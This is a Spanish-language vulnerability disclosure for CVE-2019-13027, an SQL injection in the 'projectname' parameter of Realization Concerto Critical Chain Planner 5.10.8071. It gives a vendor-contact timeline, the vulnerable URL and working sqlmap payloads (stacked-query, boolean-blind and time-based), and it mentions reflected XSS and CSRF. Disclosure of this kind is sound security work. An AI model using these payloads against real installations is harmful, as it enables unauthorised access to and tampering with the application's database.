
Detalles para divulgar CVE-2019-13027
Detalles para divulgar CVE-2019-13027
Cronología de contacto con el proveedor: 1 de julio de 2019 -> Sin respuesta, ningún correo de vuelta.
4 de julio de 2019 -> Sin respuesta, ningún correo de vuelta.
8 de julio de 2019 -> Correo enviado, Github creado.
11 de julio de 2019 -> Sin respuesta del proveedor. Vulnerabilidad divulgada.
[Tipo de vulnerabilidad] Inyección SQL [Código base del producto afectado] CONCERTO CRITICAL CHAIN PLANNER (CCPM) - Versión: 5.10.8071 (Otras versiones de la rama 5.x probablemente estén afectadas. No se puede probar con >otras ramas)
[Componente afectado] Realization Concerto Critical Chain Planner (también conocido como CCPM) 5.10.8071 tiene algunos problemas de seguridad críticos, siendo inyección SQL al menos en la página web taskupdt/taskdetails.aspx a través del parámetro "projectname"
[Tipo de ataque] Remoto
[Vectores de ataque] La aplicación tiene muchas XSS/CSRF reflejadas (por ejemplo, en checklist/checklist), pero la parte complicada son las inyecciones SQL. Se necesita algo de manipulación dependiendo de la versión de SQL Server y/o IDS/IPS.
URL: https:/concertoURL/taskupdt/taskdetails.aspx?projectname=foo&taskID=1&uniqueTaskID=2&taskuniqueid=2&reportname=&securitycode=undefined&bIsSubTask=undefined
ProjectName (foo) debe existir y ser válido. Haz fuzzing sobre el resto de parámetros (o usa una petición real). foo también tiene un XSS
SQL detectado (payloads de SQLMAP) Parámetro: projectname (GET)
Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: projectname=foo';WAITFOR DELAY '0:0:5'-- Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: projectname=foo' AND 3676=3676-- Type: time-based blind Title: Microsoft SQL Server/Sybase time-based blind (IF) Payload: projectname=foo' WAITFOR DELAY '0:0:5'--[Proveedor del producto] REALIZATION - https://www.realization.com/